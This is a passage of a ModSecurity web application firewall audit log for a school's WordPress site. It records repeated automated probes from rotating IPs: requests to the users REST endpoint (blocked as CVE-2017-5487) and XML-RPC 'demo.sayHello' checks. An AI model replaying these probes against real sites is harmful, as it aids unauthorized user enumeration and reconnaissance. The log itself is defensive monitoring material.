4722; combined=3627, p1=442, p2=2981, p3=21, p4=24, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2755e669-Z-- --ae184c48-A-- [05/May/2025:22:46:56 +0700] aBjdcIZWvR7-42f6JrAKtwAAANE 103.236.140.4 36198 103.236.140.4 8181 --ae184c48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae184c48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae184c48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460016321439 2926 (- - -) Stopwatch2: 1746460016321439 2926; combined=1349, p1=453, p2=865, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae184c48-Z-- --0aec5c12-A-- [05/May/2025:22:46:59 +0700] aBjdc4ZWvR7-42f6JrAKuwAAAMM 103.236.140.4 36230 103.236.140.4 8181 --0aec5c12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0aec5c12-C-- demo.sayHello --0aec5c12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0aec5c12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460019104559 5886 (- - -) Stopwatch2: 1746460019104559 5886; combined=4291, p1=530, p2=3533, p3=30, p4=32, p5=97, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0aec5c12-Z-- --9aa85a4d-A-- [05/May/2025:22:47:14 +0700] aBjdggRwKNFSM6B7_LaeMwAAAIg 103.236.140.4 36350 103.236.140.4 8181 --9aa85a4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9aa85a4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9aa85a4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460034168109 2977 (- - -) Stopwatch2: 1746460034168109 2977; combined=1281, p1=430, p2=822, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9aa85a4d-Z-- --06096936-A-- [05/May/2025:22:47:17 +0700] aBjdhYZWvR7-42f6JrAKwwAAAMs 103.236.140.4 36378 103.236.140.4 8181 --06096936-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06096936-C-- demo.sayHello --06096936-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06096936-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460037075234 6017 (- - -) Stopwatch2: 1746460037075234 6017; combined=4472, p1=547, p2=3697, p3=33, p4=36, p5=94, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06096936-Z-- --3a59491a-A-- [05/May/2025:22:47:29 +0700] aBjdkU2V_h1VFAgsfgZ6SAAAAA8 103.236.140.4 36462 103.236.140.4 8181 --3a59491a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a59491a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a59491a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460049189670 2669 (- - -) Stopwatch2: 1746460049189670 2669; combined=1134, p1=368, p2=740, p3=0, p4=0, p5=25, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a59491a-Z-- --d937a92d-A-- [05/May/2025:22:47:32 +0700] aBjdlPZJDMuQndL03JNZ1wAAAEw 103.236.140.4 36490 103.236.140.4 8181 --d937a92d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d937a92d-C-- demo.sayHello --d937a92d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d937a92d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460052111256 5780 (- - -) Stopwatch2: 1746460052111256 5780; combined=4342, p1=541, p2=3563, p3=35, p4=36, p5=98, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d937a92d-Z-- --17577750-A-- [05/May/2025:22:47:32 +0700] aBjdlPZJDMuQndL03JNZ2QAAAE0 103.236.140.4 36496 103.236.140.4 8181 --17577750-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --17577750-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17577750-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460052463712 2668 (- - -) Stopwatch2: 1746460052463712 2668; combined=1223, p1=414, p2=780, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17577750-Z-- --2e579c44-A-- [05/May/2025:22:47:35 +0700] aBjdl02V_h1VFAgsfgZ6UAAAABM 103.236.140.4 36530 103.236.140.4 8181 --2e579c44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.159 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e579c44-C-- demo.sayHello --2e579c44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e579c44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460055243800 5928 (- - -) Stopwatch2: 1746460055243800 5928; combined=4375, p1=604, p2=3538, p3=40, p4=36, p5=93, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e579c44-Z-- --2fb7a06b-A-- [05/May/2025:22:47:43 +0700] aBjdn_ZJDMuQndL03JNZ3wAAAFU 103.236.140.4 36606 103.236.140.4 8181 --2fb7a06b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fb7a06b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fb7a06b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460063497481 2527 (- - -) Stopwatch2: 1746460063497481 2527; combined=1106, p1=370, p2=703, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb7a06b-Z-- --4dbbc442-A-- [05/May/2025:22:47:46 +0700] aBjdogRwKNFSM6B7_LaeSgAAAI0 103.236.140.4 36642 103.236.140.4 8181 --4dbbc442-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4dbbc442-C-- demo.sayHello --4dbbc442-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dbbc442-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460066856531 5429 (- - -) Stopwatch2: 1746460066856531 5429; combined=4052, p1=502, p2=3326, p3=34, p4=33, p5=92, sr=70, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dbbc442-Z-- --9e607e65-A-- [05/May/2025:22:47:55 +0700] aBjdq4ZWvR7-42f6JrAK3QAAAMs 103.236.140.4 36720 103.236.140.4 8181 --9e607e65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e607e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e607e65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460075514250 2758 (- - -) Stopwatch2: 1746460075514250 2758; combined=1416, p1=461, p2=925, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e607e65-Z-- --91892f39-A-- [05/May/2025:22:47:58 +0700] aBjdroZWvR7-42f6JrAK4wAAANI 103.236.140.4 36744 103.236.140.4 8181 --91892f39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --91892f39-C-- demo.sayHello --91892f39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --91892f39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460078276168 5808 (- - -) Stopwatch2: 1746460078276168 5808; combined=4345, p1=548, p2=3567, p3=35, p4=35, p5=95, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91892f39-Z-- --097e0e3b-A-- [05/May/2025:22:48:08 +0700] aBjduIZWvR7-42f6JrAK6QAAAM4 103.236.140.4 36836 103.236.140.4 8181 --097e0e3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --097e0e3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --097e0e3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460088087315 3311 (- - -) Stopwatch2: 1746460088087315 3311; combined=1458, p1=481, p2=942, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --097e0e3b-Z-- --5b44ad17-A-- [05/May/2025:22:48:11 +0700] aBjdu4ZWvR7-42f6JrAK7AAAAMo 103.236.140.4 36872 103.236.140.4 8181 --5b44ad17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5b44ad17-C-- demo.sayHello --5b44ad17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b44ad17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460091854952 5544 (- - -) Stopwatch2: 1746460091854952 5544; combined=4375, p1=568, p2=3569, p3=31, p4=36, p5=100, sr=75, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b44ad17-Z-- --58bf020e-A-- [05/May/2025:22:48:26 +0700] aBjdyoZWvR7-42f6JrAK9gAAANA 103.236.140.4 36992 103.236.140.4 8181 --58bf020e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58bf020e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58bf020e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460106440344 2934 (- - -) Stopwatch2: 1746460106440344 2934; combined=1287, p1=443, p2=815, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58bf020e-Z-- --d4f8607b-A-- [05/May/2025:22:48:28 +0700] aBjdzIZWvR7-42f6JrAK-gAAAMo 103.236.140.4 37004 103.236.140.4 8181 --d4f8607b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d4f8607b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4f8607b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460108225897 2777 (- - -) Stopwatch2: 1746460108225897 2777; combined=1203, p1=410, p2=759, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4f8607b-Z-- --3ae9cd6a-A-- [05/May/2025:22:48:29 +0700] aBjdzU2V_h1VFAgsfgZ6YwAAAA8 103.236.140.4 37014 103.236.140.4 8181 --3ae9cd6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ae9cd6a-C-- demo.sayHello --3ae9cd6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae9cd6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file 